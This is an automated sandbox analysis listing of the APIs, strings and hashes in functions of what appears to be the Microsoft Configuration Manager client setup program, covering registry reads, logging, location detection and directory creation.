                                                                                          • util.cpp, xrefs: 005B71B3
                                                                                          • SOFTWARE\Microsoft\CCM, xrefs: 005B716E
                                                                                          • util.cpp, xrefs: 005B7200
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B720B
                                                                                          • LookupMPList, xrefs: 005B71D8
                                                                                          • util.cpp, xrefs: 005B719B
                                                                                          • util.cpp, xrefs: 005B7218
                                                                                          • GetLookupMPListFromRegistry, xrefs: 005B713C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetLookupMPListFromRegistry$LookupMPList$SOFTWARE\Microsoft\CCM$regKey.GetString(szMPList, sSMSMPList)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B75A8
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7633
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7698
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetSLPFromRegistry$SMSSLP$SOFTWARE\Microsoft\CCM$regKey.GetString(szSMSSLP, sSLP)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00605EBB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605F0E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605F77
                                                                                          • GetLongPathNameW.KERNEL32(00000000,00000000,00000000,?,00000000,CCM::Utility::Filesystem::File::Exists,0000006C,005F9CC5,?,CcmProfiler.dll,?,?), ref: 00605FBB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_LongNamePath
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$CCM::Utility::Filesystem::File::Exists$filePath.assign(szPath)$szPath != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00605D6F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605DC2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605E2B
                                                                                          • GetLongPathNameW.KERNEL32(00000000,00000000,?,?,?,CCM::Utility::Filesystem::Directory::Exists,0000006C,0057E854,?,?,?,ccmsetup.exe,?,?,Temp\,00000040), ref: 00605E6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_LongNamePath
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$CCM::Utility::Filesystem::Directory::Exists$filePath.assign(szDir)$szDir != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                            • Part of subcall function 0062552C: __EH_prolog3_catch.LIBCMT ref: 00625533
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Workgroup client is in Intranet, xrefs: 00643A4E
                                                                                          • CCM::LocationServices::LSGetClientLocation, xrefs: 00643795
                                                                                          • %s client is in Internet, xrefs: 00643A86
                                                                                          • Domain joined, xrefs: 00643985, 006439C2, 00643A85, 00643AAD
                                                                                          • Domain joined client is in Intranet, xrefs: 006439FF
                                                                                          • Domain joined client is in Internet, xrefs: 00643923
                                                                                          • Client may be in Internet without any network connection, xrefs: 0064387B
                                                                                          • %s client is in Unknown location, xrefs: 00643AAE
                                                                                          • Workgroup, xrefs: 0064398A
                                                                                          • %s client is in Intranet, xrefs: 006439C3
                                                                                          • CCM Client is marked as always on the internet, client location is CCM_CLIENTLOCATION_INTERNET, xrefs: 006437FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: %s client is in Internet$%s client is in Intranet$%s client is in Unknown location$CCM Client is marked as always on the internet, client location is CCM_CLIENTLOCATION_INTERNET$CCM::LocationServices::LSGetClientLocation$Client may be in Internet without any network connection$Domain joined$Domain joined client is in Internet$Domain joined client is in Intranet$Workgroup$Workgroup client is in Intranet
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061F869
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F8CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F92B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$0 != szRegEntryName$0 != szRegKey$CcmUtilLib::ReadRegistryEntryStr
                                                                                          • API String ID: 3375736234-35468896
                                                                                          • Opcode ID: 9cd0730f9e15c42366688f323ffbb49b5f2d40387d95051a7e02cbf38b37d652
                                                                                          • Instruction ID: 08379f2d0fb27ccb4855cd34a3540d8cc3870df658173bd2e997cc96408a9489
                                                                                          • Opcode Fuzzy Hash: 9cd0730f9e15c42366688f323ffbb49b5f2d40387d95051a7e02cbf38b37d652
                                                                                          • Instruction Fuzzy Hash: 2431EF71980359FADB11EBA4D80ABEDBA71AF50B14F184155F9417B3C2C7B80E46D391
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C213
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetString$Get(pszName, &vValue, VT_BSTR)$pszName != 0
                                                                                          • API String ID: 981364226-2030028387
                                                                                          • Opcode ID: 5e47b1e459a7fa5c349a988f73d6fd4c7d162a15c5dc3101e91913307ebdb452
                                                                                          • Instruction ID: 9a0547d9b63539772aacbb4e543f75c16f1fc0c98c5b3e3c4483f632d42c5265
                                                                                          • Opcode Fuzzy Hash: 5e47b1e459a7fa5c349a988f73d6fd4c7d162a15c5dc3101e91913307ebdb452
                                                                                          • Instruction Fuzzy Hash: EC31F6709C1309AEDB19EBA0C91BBEE7E62AF51B20F144149B905673C3CBB40F09C7A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetDword$Get(pszName, vValue, VT_UI4)$pszName != 0
                                                                                          • API String ID: 981364226-1784177122
                                                                                          • Opcode ID: 4cce67f208b0100c0641b3301e3b4354708c769ef2630f8529e702fe61f31c45
                                                                                          • Instruction ID: 5fbd7739ea6b44716e9d44910e7fa161de718e830baa242208a6e0b6479b43b6
                                                                                          • Opcode Fuzzy Hash: 4cce67f208b0100c0641b3301e3b4354708c769ef2630f8529e702fe61f31c45
                                                                                          • Instruction Fuzzy Hash: 633107709C0244EADB29EBA0C95ABEF7E62AF51721F149059F8006B3C2CBF50F09C795
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F61A
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$0 != szRegEntryName$0 != szRegKey$CcmUtilLib::ReadRegistryEntryDWORD
                                                                                          • API String ID: 921656330-1582721282
                                                                                          • Opcode ID: 00f7254292da3e3f35345da9e4be3725379c48bee169f554f2d5f58fe1eb74b3
                                                                                          • Instruction ID: f076df805076a5755e32d5b00119ee7c506a9dac1b709367e2c5c8c84dbb435e
                                                                                          • Opcode Fuzzy Hash: 00f7254292da3e3f35345da9e4be3725379c48bee169f554f2d5f58fe1eb74b3
                                                                                          • Instruction Fuzzy Hash: 2A31E67198134AEADF10EFA0991ABED7E626F61B14F184055F5007B2C2CAB94F45C7E2
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063529D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                          • GetSystemTime.KERNEL32(?,CCM::FspUtilLib::CFSPStateMessage::CFSPStateMessage,?,FSPStateMessage,00000000,?,00000018,00000005,Function_0008419F,00578034,0000003C,005CA20D,00000174,005C9F01,?,?), ref: 006353DC
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_SystemTime
                                                                                          • String ID: CCM::FspUtilLib::CFSPStateMessage::CFSPStateMessage$CFSPStateMessage::CFSPStateMessage$FSPStateMessage$HostName$HttpAlternatePort$HttpPort$IntranetHostName$Software\Microsoft\CCM\FSP
                                                                                          • API String ID: 555624483-106147692
                                                                                          • Opcode ID: d635a8ad640149cbbf93fbc8218962321fa70ef4bc091b19d15f3c0fdf933a28
                                                                                          • Instruction ID: 93a4317c8f79bbf1a69705ca809ce5e06b9ed7a9fa3ef77413ba2c33d1834278
                                                                                          • Opcode Fuzzy Hash: d635a8ad640149cbbf93fbc8218962321fa70ef4bc091b19d15f3c0fdf933a28
                                                                                          • Instruction Fuzzy Hash: 55510070801749EADB14EFA4C94ABEEBFB5BF10304F50445DE186A72C2DBB82A48CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593C4A
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s was passed an invalid value. Verify the value is numeric and greater than zero.$%s, HRESULT=%08lx (%s,%lu)$/retry:$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-2753467663
                                                                                          • Opcode ID: ca89faeed54aa5448cae3c6cbee4f8832c7dcdfc5469c0d5e2e1c7ef684bddec
                                                                                          • Instruction ID: 2d3e2e639f7f64ca13f34c524d84636bbcc004d10b7489ffce23a561b6937c18
                                                                                          • Opcode Fuzzy Hash: ca89faeed54aa5448cae3c6cbee4f8832c7dcdfc5469c0d5e2e1c7ef684bddec
                                                                                          • Instruction Fuzzy Hash: DF51CE30A84358EAEF25EBA0CD5EBEDBB60AB51704F6044DAF5057A1C2DBB41F44CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0057DAE1
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB18
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB2E
                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB38
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057DB6E
                                                                                          Strings
                                                                                          • CcmSetup::CreateDownloadDirectory, xrefs: 0057DAED
                                                                                          • ccmsetup.cpp, xrefs: 0057DB76
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057DB69
                                                                                          • ccmsetup.cpp, xrefs: 0057DB5E
                                                                                          • CreateDirectoryW( m_sDownloadDir, 0 ), xrefs: 0057DB64
                                                                                          Similarity
                                                                                          • API ID: AttributesCreateCurrentDirectoryErrorFileH_prolog3_catchLastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::CreateDownloadDirectory$CreateDirectoryW( m_sDownloadDir, 0 )$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1311896448-140672756
                                                                                          • Opcode ID: 8c47e5306de3168c0eae0dbf88953003fcbbff197c064d3dee019307d91e113b
                                                                                          • Instruction ID: 4bc82eb5e08a738788084e08fb64d32f39f0c5f83bf071fc64a30658d0aff42b
                                                                                          • Opcode Fuzzy Hash: 8c47e5306de3168c0eae0dbf88953003fcbbff197c064d3dee019307d91e113b
                                                                                          • Instruction Fuzzy Hash: 4B110331A4034197D720ABB89C49B9E7EF6BF81721F0A8119F548972C1CA254D04AAB1
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005932A0
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Invalid argument: %s$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$iPos > 0$Fl
                                                                                          • API String ID: 2882836952-3542515626
                                                                                          • Opcode ID: d7c655b3dd78a05e9b74983cba5d423b30afddb6445f0eb22b0d5daac0ea7ea5
                                                                                          • Instruction ID: 112b4d9f3ea5c8364863efd80cc98dbbd272259b4a94183a6f2922c561055aaf
                                                                                          • Opcode Fuzzy Hash: d7c655b3dd78a05e9b74983cba5d423b30afddb6445f0eb22b0d5daac0ea7ea5
                                                                                          • Instruction Fuzzy Hash: DA519A30A44358EAEF25DBA4CD1ABDDBBB4AB51704F5044C9E6447B1C2DBB41F88CB92
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F266D
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F0651: __EH_prolog3_catch.LIBCMT ref: 005F0658
                                                                                            • Part of subcall function 005F0651: __CxxThrowException@8.LIBCMT ref: 005F06C5
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6706: RegCloseKey.ADVAPI32(00000000,?,005F7287,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005F6714
                                                                                            • Part of subcall function 005F7229: RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C), ref: 005F72CF
                                                                                            • Part of subcall function 005F7229: RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000300,00000000,00000000), ref: 005F733B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F274A
                                                                                          Strings
                                                                                          • Failed to refresh logging config for component '%s' (0x%08x), xrefs: 005F27CD
                                                                                          • ..\Logging.cpp, xrefs: 005F2752
                                                                                          • Software\Microsoft\CCM\Logging\DebugLogging, xrefs: 005F26B7
                                                                                          • ..\Logging.cpp, xrefs: 005F273A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2745
                                                                                          • g_LogHandlerInfo.pResetConfigProc(), xrefs: 005F2740
                                                                                          • Software\Microsoft\CCM\Logging\TAFLogging, xrefs: 005F26E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseOpen$CurrentException@8H_prolog3ThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$Failed to refresh logging config for component '%s' (0x%08x)$Software\Microsoft\CCM\Logging\DebugLogging$Software\Microsoft\CCM\Logging\TAFLogging$g_LogHandlerInfo.pResetConfigProc()
                                                                                          • API String ID: 3651561300-727670264
                                                                                          • Opcode ID: 0de2d4076dba5c17fc9cebe0b0d470f7670641a1d8f2af811ffdc1a13717df17
                                                                                          • Instruction ID: 107fe942eb606e65e2c7301c22ce09ce2f8f61095726bb6745cdf0cfab7f7950
                                                                                          • Opcode Fuzzy Hash: 0de2d4076dba5c17fc9cebe0b0d470f7670641a1d8f2af811ffdc1a13717df17
                                                                                          • Instruction Fuzzy Hash: 215106B4A4524AEBDB01EB68DC89BFEBFB4FF54300F148058E541A72D2DB785A05DB60
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593117
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetSetupCommandLine(&pszaArgs, uNumArgs, sCommandLine, bCanExit)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$;!$Fl
                                                                                          • API String ID: 3276020833-1531629218
                                                                                          • Opcode ID: 2ac812af98e0f4e8f94e9cf7ca43a8a0e7dcb42606d029167f637ac9b49be4cf
                                                                                          • Instruction ID: 8f78ae10a8d132fa20c0413754bd3775ea29b80ac14617fdc664a9c1db9b749e
                                                                                          • Opcode Fuzzy Hash: 2ac812af98e0f4e8f94e9cf7ca43a8a0e7dcb42606d029167f637ac9b49be4cf
                                                                                          • Instruction Fuzzy Hash: FB41DB30A48358EAEF25EAA0CD5ABEEBF60AB51704F5004D9F6043B1C2DBB41F84CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005944FA
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ParseCommonSwitches(sArg, bValidArg, true)$ccmsetup.cpp$ccmsetup.cpp$;!$Fl
                                                                                          • API String ID: 3276020833-4143258054
                                                                                          • Opcode ID: 35afe25cd129cf57107c50803cb24dcd8a919850670d07a11ba50589cd88d02e
                                                                                          • Instruction ID: 97fdd2d74dc14c2ad919b815197d82b67d6c5f314d1a51d9a81041d2326f8235
                                                                                          • Opcode Fuzzy Hash: 35afe25cd129cf57107c50803cb24dcd8a919850670d07a11ba50589cd88d02e
                                                                                          • Instruction Fuzzy Hash: 9741DC31A44358EAEF25DAA0CD5ABEEBF64AB51704F6004DAF6056B1C2DBB02F44CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593D80
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: d28245efe4702522def5b3f799565e9fc5e15ee9efb59de976a9464db68a5c70
                                                                                          • Instruction ID: c35932e76d2d6340a81eb15776a513b250b32b170b2c10b888b01a04bff53584
                                                                                          • Opcode Fuzzy Hash: d28245efe4702522def5b3f799565e9fc5e15ee9efb59de976a9464db68a5c70
                                                                                          • Instruction Fuzzy Hash: 4041CC31A44358EAEF25DAA0CD5ABEDBB60AB51704F2044DAF2056B1C2DBB42F84CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593D08
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: 8bb7c367ddbefc0ea97dd670813be81a9f312c2818a37e25e6f56bdb4f293302
                                                                                          • Instruction ID: f8e339396ae6afc629fe3bee5cf95ec6f9d4784fd052230ab9666dee56116ccc
                                                                                          • Opcode Fuzzy Hash: 8bb7c367ddbefc0ea97dd670813be81a9f312c2818a37e25e6f56bdb4f293302
                                                                                          • Instruction Fuzzy Hash: AB419D30A44358EAEF25EAA0CD5ABEDBB60AB51704F5044DAF6056B1C2DBB42F84CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059361C
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: 94c18480f3b0469e02a9944bb9101803e169fec3e953acebf726261ef2748c0a
                                                                                          • Instruction ID: f6c59158710a626c3509dbed33ec333cd48eeefb2d395aca2f70d18435aa9638
                                                                                          • Opcode Fuzzy Hash: 94c18480f3b0469e02a9944bb9101803e169fec3e953acebf726261ef2748c0a
                                                                                          • Instruction Fuzzy Hash: 1341D930A44358EAEF25EAA0CD5ABEDBF60AB51704F5044CAB6053B1C2DBB11F84CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593E1F
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-1917738380
                                                                                          • Opcode ID: eb5378dec337723bbc1b0a82d8fad5a987e72c650b662ac5596c67d66786c6fa
                                                                                          • Instruction ID: 945c85a97827383366b41c12b619deb039c1b5532f34f38a3fbc397304a1ee01
                                                                                          • Opcode Fuzzy Hash: eb5378dec337723bbc1b0a82d8fad5a987e72c650b662ac5596c67d66786c6fa
